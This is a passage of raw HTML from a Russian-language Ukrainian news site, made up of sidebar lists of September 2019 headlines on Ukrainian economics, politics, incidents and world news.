U-2 для перехвата баллистических ракет <span>(1525)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news-finance/full/1709-v-ukraine-vyrosli-ceny-na-55-produktov-iz-socialnoj-korziny" title="В Украине выросли цены на 55% продуктов из социальной корзины"><img width="210" height="156" alt="В Украине выросли цены на 55% продуктов из социальной корзины" src="https://enovosty.com/wp-content/uploads/2019/09/21106764_1982008175347182_8580891544658001413_n.jpg"></a><a href="https://enovosty.com/news-finance/full/1709-v-ukraine-vyrosli-ceny-na-55-produktov-iz-socialnoj-korziny" title="В Украине выросли цены на 55% продуктов из социальной корзины" class="name">В Украине выросли цены на 55% продуктов из социальной корзины <span>(156)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news-markets/full/1709-v-ukraine-rezko-sokratilos-kolichestvo-bezrabotnyx" title="В Украине резко сократилось количество безработных"><img width="210" height="156" alt="В Украине резко сократилось количество безработных" src="https://enovosty.com/wp-content/uploads/2019/09/rabota.jpg"></a><a href="https://enovosty.com/news-markets/full/1709-v-ukraine-rezko-sokratilos-kolichestvo-bezrabotnyx" title="В Украине резко сократилось количество безработных" class="name">В Украине резко сократилось количество безработных <span>(479)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/1709-v-seti-pokazali-obnovlennyj-most-klichko-v-kieve-video" title="В Сети показали обновленный “мост Кличко” в Киеве (ВИДЕО)"><img width="210" height="156" alt="В Сети показали обновленный “мост Кличко” в Киеве (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2019/09/89-e1568714801409.jpeg"></a><a href="https://enovosty.com/news_kiev/full/1709-v-seti-pokazali-obnovlennyj-most-klichko-v-kieve-video" title="В Сети показали обновленный “мост Кличко” в Киеве (ВИДЕО)" class="name">В Сети показали обновленный “мост Кличко” в Киеве (ВИДЕО) <span>(3568)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1709-ukraincev-zastavyat-rasskazat-gosudarstvu-vsyo-o-svoem-imushhestve-inache-nakazanie" title="Украинцев заставят рассказать государству всё о своем имуществе. Иначе - наказание"><img width="210" height="156" alt="Украинцев заставят рассказать государству всё о своем имуществе. Иначе - наказание" src="https://enovosty.com/wp-content/uploads/2019/09/dekl-min1-1.jpg"></a><a href="https://enovosty.com/news_economy/full/1709-ukraincev-zastavyat-rasskazat-gosudarstvu-vsyo-o-svoem-imushhestve-inache-nakazanie" title="Украинцев заставят рассказать государству всё о своем имуществе. Иначе - наказание" class="name">Украинцев заставят рассказать государству всё о своем имуществе. Иначе - наказание <span>(935)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news-finance/full/1709-v-ukraine-minus-odin-bank-chto-budet-s-klientami" title="В Украине - минус один банк. Что будет с клиентами?"><img width="210" height="156" alt="В Украине - минус один банк. Что будет с клиентами?" src="https://enovosty.com/wp-content/uploads/2019/09/2396250.jpg"></a><a href="https://enovosty.com/news-finance/full/1709-v-ukraine-minus-odin-bank-chto-budet-s-klientami" title="В Украине - минус один банк. Что будет с клиентами?" class="name">В Украине - минус один банк. Что будет с клиентами? <span>(658)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1709-ukraincev-zavalili-ploxoj-kartoshkoj-iz-belarusi-chto-budet-s-cenami-na-ovoshh" title="Украинцев завалили плохой картошкой из Беларуси. Что будет с ценами на овощ?"><img width="210" height="156" alt="Украинцев завалили плохой картошкой из Беларуси. Что будет с ценами на овощ?" src="https://enovosty.com/wp-content/uploads/2019/09/kartofel.jpg"></a><a href="https://enovosty.com/news_economy/full/1709-ukraincev-zavalili-ploxoj-kartoshkoj-iz-belarusi-chto-budet-s-cenami-na-ovoshh" title="Украинцев завалили плохой картошкой из Беларуси. Что будет с ценами на овощ?" class="name">Украинцев завалили плохой картошкой из Беларуси. Что будет с ценами на овощ? <span>(933)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1709-v-ukraine-serezno-vozmutsya-za-nelegalnye-azs-chem-grozit-torgovlya-bez-licenzii" title="В Украине серьезно возьмутся за нелегальные АЗС: чем грозит торговля без лицензии"><img width="210" height="156" alt="В Украине серьезно возьмутся за нелегальные АЗС: чем грозит торговля без лицензии" src="https://enovosty.com/wp-content/uploads/2019/09/55549fc756ea2-e1568660556818.jpg"></a><a href="https://enovosty.com/news_economy/full/1709-v-ukraine-serezno-vozmutsya-za-nelegalnye-azs-chem-grozit-torgovlya-bez-licenzii" title="В Украине серьезно возьмутся за нелегальные АЗС: чем грозит торговля без лицензии" class="name">В Украине серьезно возьмутся за нелегальные АЗС: чем грозит торговля без лицензии <span>(777)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/1609-v-kieve-desyatki-avto-oblili-kislotoj-video" title="В Киеве десятки авто облили кислотой (ВИДЕО)"><img width="210" height="156" alt="В Киеве десятки авто облили кислотой (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2019/09/2019-09-16-11.png"></a><a href="https://enovosty.com/news_kiev/full/1609-v-kieve-desyatki-avto-oblili-kislotoj-video" title="В Киеве десятки авто облили кислотой (ВИДЕО)" class="name">В Киеве десятки авто облили кислотой (ВИДЕО) <span>(5554)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/armiya-video/full/1609-na-lvovshhine-startovali-ukrainsko-amerikanskie-voennye-ucheniya-rapid-trident-2019-video" title="На Львовщине стартовали украинско-американские военные учения Rapid Trident-2019 (ВИДЕО)"><img width="210" height="156" alt="На Львовщине стартовали украинско-американские военные учения Rapid Trident-2019 (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2019/09/650x434.jpg"></a><a href="https://enovosty.com/armiya-video/full/1609-na-lvovshhine-startovali-ukrainsko-amerikanskie-voennye-ucheniya-rapid-trident-2019-video" title="На Львовщине стартовали украинско-американские военные учения Rapid Trident-2019 (ВИДЕО)" class="name">На Львовщине стартовали украинско-американские военные учения "Rapid Trident-2019" (ВИДЕО) <span>(348)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news-finance/full/1609-pensionnyj-fond-v-smartfone-kak-oformit-e-pensiyu" title="ПФУ запустил в тестовом режиме мобильное приложение для оформления пенсий"><img width="210" height="156" alt="ПФУ запустил в тестовом режиме мобильное приложение для оформления пенсий" src="https://enovosty.com/wp-content/uploads/2019/09/original-16.jpg"></a><a href="https://enovosty.com/news-finance/full/1609-pensionnyj-fond-v-smartfone-kak-oformit-e-pensiyu" title="ПФУ запустил в тестовом режиме мобильное приложение для оформления пенсий" class="name">ПФУ запустил в тестовом режиме мобильное приложение для оформления пенсий <span>(311)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/1609-tramp-prodolzhaet-ugrozhat-vragam-ssha-razrushitelnoj-siloj-prevosxodyashhej-yadernoe-oruzhie" title="Трамп продолжает угрожать врагам США “разрушительной силой”, превосходящей ядерное оружие"><img width="210" height="156" alt="Трамп продолжает угрожать врагам США “разрушительной силой”, превосходящей ядерное оружие" src="https://enovosty.com/wp-content/uploads/2019/09/12-e1568561400531.jpg"></a><a href="https://enovosty.com/news_abroad/full/1609-tramp-prodolzhaet-ugrozhat-vragam-ssha-razrushitelnoj-siloj-prevosxodyashhej-yadernoe-oruzhie" title="Трамп продолжает угрожать врагам США “разрушительной силой”, превосходящей ядерное оружие" class="name">Трамп продолжает угрожать врагам США “разрушительной силой”, превосходящей ядерное оружие <span>(1989)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1609-panika-na-birzhax-nedelyu-mirovye-rynki-nachali-infarktom" title="Паника на биржах: Неделю мировые рынки начали «инфарктом»"><img width="210" height="156" alt="Паника на биржах: Неделю мировые рынки начали «инфарктом»" src="https://enovosty.com/wp-content/uploads/2019/09/birzha.jpg"></a><a href="https://enovosty.com/news_economy/full/1609-panika-na-birzhax-nedelyu-mirovye-rynki-nachali-infarktom" title="Паника на биржах: Неделю мировые рынки начали «инфарктом»" class="name">Паника на биржах: Неделю мировые рынки начали «инфарктом» <span>(1584)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/1609-stali-izvestny-podrobnosti-ekonomicheskoj-integracii-rossii-i-belorussii" title="Стали известны подробности экономической интеграции России и Белоруссии"><img width="210" height="156" alt="Стали известны подробности экономической интеграции России и Белоруссии" src="https://enovosty.com/wp-content/uploads/2018/12/lukashenko-e1544422022824.jpg"></a><a href="https://enovosty.com/news_abroad/full/1609-stali-izvestny-podrobnosti-ekonomicheskoj-integracii-rossii-i-belorussii" title="Стали известны подробности экономической интеграции России и Белоруссии" class="name">Стали известны подробности экономической интеграции России и Белоруссии <span>(614)</span></a></li></ul></li></ul></div><div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=491&pid=10929" rel="bookmark">Из чего состоят привычные нам вещи</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=491&pid=10929" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/vintik/thumbs/thumbs_apart03.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости мира</p></div><div class='cls'></div><span class='news_date'>17.09.2019 г.</span><br /><div class="post_news"><span id="post-4773478"><span class="postDate">23:10</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-vzryv-v-stolice-afganistana-unes-zhizni-po-menshej-mere-22-lyudej-video">Взрыв в столице Афганистана унес жизни по меньшей мере 22 людей (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4773416"><span class="postDate">22:30</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-v-dr-kongo-arestovali-eks-ministra-zdravooxraneniya-za-maxinacii-so-sredstvami-vydelennymi-na-borbu-s-eboloj">В ДР Конго арестовали экс-министра здравоохранения за махинации со средствами, выделенными на борьбу с Эболой</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4773406"><span class="postDate">22:00</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-orgkomitet-zimnix-olimpijskix-i-paralimpijskix-igr-predstavil-talismany-sportivnyx-sostyazanij-foto">Оргкомитет зимних Олимпийских и Паралимпийских игр представил талисманы спортивных состязаний (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4773475"><span class="postDate">21:59</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-amerikanskie-voennye-podtverdili-podlinnost-video-s-nlo-video">Американские военные подтвердили подлинность видео с НЛО (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4773462"><span class="postDate">21:04</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva">Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4773454"><span class="postDate">20:34</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-associated-press-verxovnyj-lider-irana-zayavil-chto-s-ssha-ne-budet-peregovorov-ni-na-kakom-urovne">Associated Press: Верховный лидер Ирана заявил, что с США не будет переговоров ни на каком уровне</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4773447"><span class="postDate">20:14</span><a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-v-afganistane-proizoshel-krovavyj-terakt-46-pogibshix">В Афганистане произошел кровавый теракт: 46 погибших</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_abroad">Все новости мира</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">17.09.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1709-polovina-deneg-na-oboronku-dorogi-i-dolgi-byudzhet-2020-v-cifrax-i-ocenkax-ekspertov">Половина денег на оборонку, дороги и долги: Бюджет 2020 в цифрах и оценках экспертов</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/1709-polovina-deneg-na-oboronku-dorogi-i-dolgi-byudzhet-2020-v-cifrax-i-ocenkax-ekspertov"><img width="230" alt="Половина денег на оборонку, дороги и долги: Бюджет 2020 в цифрах и оценках экспертов" src="/wp-content/uploads/2019/09/bjudzhet.jpeg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/1709-polovina-deneg-na-oboronku-dorogi-i-dolgi-byudzhet-2020-v-cifrax-i-ocenkax-ekspertov">Минимальная зарплата почти 5 тыс грн, доллар по 28, половина денег на оборонку и долги - Кабмин внес на рассмотрение народных депутатов проект закона ...</a></span></div><div class="block"><div class="info"><span class="postDate">16.09.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1609-itogi-dnya-panika-na-birzhax-rasplata-za-krov-kiborgov-i-vtoraya-zajceva-v-xarkove">Итоги дня: Паника на биржах, расплата за кровь "киборгов" и "вторая Зайцева" в Харькове</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1609-itogi-dnya-panika-na-birzhax-rasplata-za-krov-kiborgov-i-vtoraya-zajceva-v-xarkove"><img width="230" alt="Итоги дня: Паника на биржах, расплата за кровь киборгов и вторая Зайцева в Харькове" src="/wp-content/uploads/2019/09/oil-prices-987357-e1568647960342.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1609-itogi-dnya-panika-na-birzhax-rasplata-za-krov-kiborgov-i-vtoraya-zajceva-v-xarkove">Рынку нефти грозит рекордный за 29 лет шок, в Мариуполе расстреляли убийцу "киборгов", а в Харькове девушка на кабриолете влетела в толпу пешеходов, ...</a></span></div><div class="block"><div class="info"><span class="postDate">13.09.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1309-itogi-dnya-troyanskij-kon-putina-novaya-realnost-v-ukraine-i-silnaya-rech-sencova">Итоги дня: "Троянский конь" Путина, "новая реальность" в Украине и сильная речь Сенцова</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1309-itogi-dnya-troyanskij-kon-putina-novaya-realnost-v-ukraine-i-silnaya-rech-sencova"><img width="230" alt="Итоги дня: Троянский конь Путина, новая реальность в Украине и сильная речь Сенцова" src="/wp-content/uploads/2019/09/17111951.303374.9953-e1568394249717.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1309-itogi-dnya-troyanskij-kon-putina-novaya-realnost-v-ukraine-i-silnaya-rech-sencova">Верховная Рада уволила Центральную избирательную комиссию, президент Зеленский рассказал, когда можно будет проводить выборы на Донбассе, а в Киеве начал ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>17.09.2019 г.</span><br /><div class="post_news"> <span id="post-4773483"> <span class="postDate">23:58</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1709-otomstila-lesniku-sud-vzyal-pod-domashnij-arest-zhenshhinu-spalivshuyu-14-gektarov-lesa-v-chernobyle">Отомстила леснику: Суд взял под домашний арест женщину, спалившую 14 гектаров леса в Чернобыле</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773478"> <span class="postDate">23:10</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-vzryv-v-stolice-afganistana-unes-zhizni-po-menshej-mere-22-lyudej-video">Взрыв в столице Афганистана унес жизни по меньшей мере 22 людей (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773424"> <span class="postDate">23:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-v-2020-godu-ozhidaetsya-novaya-volna-trudovoj-migracii-kuda-poedut-ukraincy">В 2020 году ожидается новая волна трудовой миграции: куда поедут украинцы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773420"> <span class="postDate">22:45</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1709-ukrainskix-lyubitelej-b-u-avto-mogut-zhdat-nepriyatnye-syurprizy">Украинских любителей б/у авто могут ждать неприятные сюрпризы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773416"> <span class="postDate">22:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-v-dr-kongo-arestovali-eks-ministra-zdravooxraneniya-za-maxinacii-so-sredstvami-vydelennymi-na-borbu-s-eboloj">В ДР Конго арестовали экс-министра здравоохранения за махинации со средствами, выделенными на борьбу с Эболой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773414"> <span class="postDate">22:15</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1709-v-verxovnoj-rade-predlozhili-ubrat-penyu-za-ne-vovremya-oplachennuyu-kommunalku">В Верховной Раде предложили убрать пеню за не вовремя оплаченную коммуналку</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773406"> <span class="postDate">22:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-orgkomitet-zimnix-olimpijskix-i-paralimpijskix-igr-predstavil-talismany-sportivnyx-sostyazanij-foto">Оргкомитет зимних Олимпийских и Паралимпийских игр представил талисманы спортивных состязаний (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773475"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-amerikanskie-voennye-podtverdili-podlinnost-video-s-nlo-video">Американские военные подтвердили подлинность видео с НЛО (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773470"> <span class="postDate">21:44</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-iskusstvennyj-intellekt-dopisal-simfoniyu-izvestnogo-avstrijskogo-kompozitora">Искусственный интеллект дописал симфонию известного австрийского композитора</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773466"> <span class="postDate">21:26</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1709-na-poltavshhine-nanyali-professionalnyx-lovcov-chtoby-pojmat-svinej-vreditelej-video">На Полтавщине наняли профессиональных ловцов, чтобы поймать свиней-вредителей (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773462"> <span class="postDate">21:04</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-reuters-ssha-i-belarus-vozvrashhayut-poslov-posle-desyatiletnego-pereryva">Reuters: США и Беларусь возобновляют обмен послами после десятилетнего перерыва</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773460"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1709-v-stolice-pyanyj-rabotnik-sto-vzyal-pokatatsya-chuzhoe-avto-i-ustroil-pogonyu-s-dtp">В столице пьяный работник СТО взял покататься чужое авто и устроил погоню с ДТП</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773454"> <span class="postDate">20:34</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-associated-press-verxovnyj-lider-irana-zayavil-chto-s-ssha-ne-budet-peregovorov-ni-na-kakom-urovne">Associated Press: Верховный лидер Ирана заявил, что с США не будет переговоров ни на каком уровне</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773447"> <span class="postDate">20:14</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-v-afganistane-proizoshel-krovavyj-terakt-46-pogibshix">В Афганистане произошел кровавый теракт: 46 погибших</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773439"> <span class="postDate">20:05</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1709-kolotilin-planiruet-ostatsya-tenevym-smotryashhim-pri-novom-glave-gosgeokadastra-smi">Колотилин планирует остаться теневым смотрящим при новом главе Госгеокадастра, – СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773445"> <span class="postDate">19:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-voennyj-ssha-rasskazal-kak-tramp-pomozhet-ukraine">Военный США рассказал, как Трамп поможет Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773432"> <span class="postDate">19:35</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-reuters-sovbez-oon-prinyal-rezolyuciyu-o-neobxodimosti-prodleniya-missii-ssha-v-afganistane">Reuters: Совбез ООН принял резолюцию о необходимости продления миссии США в Афганистане</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773429"> <span class="postDate">19:03</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-v-ukraine-mozhet-poyavitsya-analog-monte-karlo-ili-las-vegasa">В Украине может появиться аналог Монте-Карло или Лас-Вегаса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773427"> <span class="postDate">18:54</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1709-ukrainskim-fermeram-vydelyat-44-milliarda-na-udeshevlenie-kreditov">Украинским фермерам выделят 4,4 миллиарда на удешевление кредитов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773423"> <span class="postDate">18:32</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-sbu-blokirovala-mexanizm-nelegalnoj-perepravki-cherez-gosudarstvennuyu-granicu">СБУ блокировала механизм нелегальной переправки иностранцев через государственную границу</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773419"> <span class="postDate">18:06</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1709-eksperty-rasskazali-ob-oshibkax-pri-myte-volos-kotorye-dopuskayutsya-pochti-vsemi">Эксперты рассказали об ошибках при мытье волос, которые допускаются почти всеми</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773400"> <span class="postDate">17:57</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-v-ssha-uspeshno-integrirovali-istrebiteli-a-35-s-samoletami-shpionami-u-2-dlya-perexvata-ballisticheskix-raket">В США успешно интегрировали истребитель F-35 с самолетом-шпионом U-2 для перехвата баллистических ракет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773401"> <span class="postDate">17:42</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-v-kosovo-proshli-sovmestnye-ucheniya-ukrainskix-i-vengerskix-voennosluzhashhix">В Косово прошли совместные учения украинских и венгерских военнослужащих (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773393"> <span class="postDate">17:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-karpyuk-rasskazal-o-pytkax-v-rf">Карпюк рассказал о пытках в РФ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773387"> <span class="postDate">16:57</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1709-v-ukraine-vyrosli-ceny-na-55-produktov-iz-socialnoj-korziny">В Украине выросли цены на 55% продуктов из социальной корзины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773380"> <span class="postDate">16:43</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1709-uchenye-sozdali-biorobota-kotoryj-mozhet-peredvigatsya-v-chelovecheskom-tele">Ученые создали биоробота, который может передвигаться в человеческом теле</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773381"> <span class="postDate">16:38</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1709-neft-desheveet-posle-rekordnogo-rosta-nakanune">Нефть дешевеет после рекордного роста накануне</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773377"> <span class="postDate">16:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-obnaruzheno-samoe-bolshoe-derevo-v-mire">Обнаружено самое большое дерево в мире</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773371"> <span class="postDate">16:13</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-investory-reagiruyut-pozitivno-na-sistemnye-resheniya-v-bolshom-i-srednem-biznese-andrej-krivonos">Инвесторы реагируют позитивно на системные решения в большом и среднем бизнесе, - Андрей Кривонос</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773340"> <span class="postDate">16:08</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-arxeologi-nashli-mesto-gde-iisus-poyavilsya-posle-raspyatiya">Археологи нашли место, где Иисус появился после распятия</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773361"> <span class="postDate">15:48</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-evroparlament-podderzhal-naznachenie-lagard-na-post-glavy-evropejskogo-centralnogo-banka">Европарламент поддержал назначение Лагард на пост главы Европейского центрального банка</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773357"> <span class="postDate">15:32</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1709-stali-izvestny-vrednye-dlya-zdorovya-privychki-kotorye-pochemu-to-schitayutsya-poleznymi">Стали известны вредные для здоровья привычки, которые почему-то считаются полезными</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773345"> <span class="postDate">15:23</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/1709-kolomojskij-mozhet-sorvat-kredit-mvf-ekonomist">Коломойский может сорвать кредит МВФ — экономист</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773344"> <span class="postDate">15:04</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-ot-rossijskogo-mirnogo-atoma-nachinayut-otkazyvatsya-davnie-partnery-zloj-odessit">От российского "мирного атома" начинают отказываться давние партнеры, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773265"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1709-34-milliona-pogibshix-za-5-chasov-v-seti-pokazali-kompyuternuyu-simulyaciyu-yadernoj-vojny-mezhdu-ssha-i-rossiej-video">34 миллиона погибших за 5 часов: В Сети показали компьютерную симуляцию ядерной войны между США и Россией (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773334"> <span class="postDate">14:48</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1709-ssha-sozdadut-istrebiteli-novogo-pokoleniya">США создадут истребители нового поколения</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773269"> <span class="postDate">14:45</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1709-v-ukraine-massovo-shtrafuyut-nelegalnye-azs">В Украине массово штрафуют нелегальные АЗС</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773326"> <span class="postDate">14:30</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1709-nazvali-frukt-kotoryj-pomozhet-omolodit-krov">Назвали фрукт, который поможет омолодить кровь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773275"> <span class="postDate">14:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-v-evropu-idet-monstr-s-vostoka-sinoptiki-prognoziruyut-samuyu-lyutuyu-zimu-za-poslednie-tridcat-let">В Европу идет “монстр с Востока”: синоптики прогнозируют самую лютую зиму за последние тридцать лет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773320"> <span class="postDate">14:21</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1709-raskryt-glavnyj-koshachij-sekret-stalo-izvestno-kak-eti-zhivotnye-obshhayutsya-mezhdu-soboj">Раскрыт главный кошачий секрет: стало известно, как эти животные общаются между собой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773277"> <span class="postDate">14:15</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1709-eksperty-nazvali-luchshie-gadzhety-dlya-detej">Эксперты назвали лучшие гаджеты для детей</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4773282"> <span class="postDate">14:15</span> <a class="postTitle" 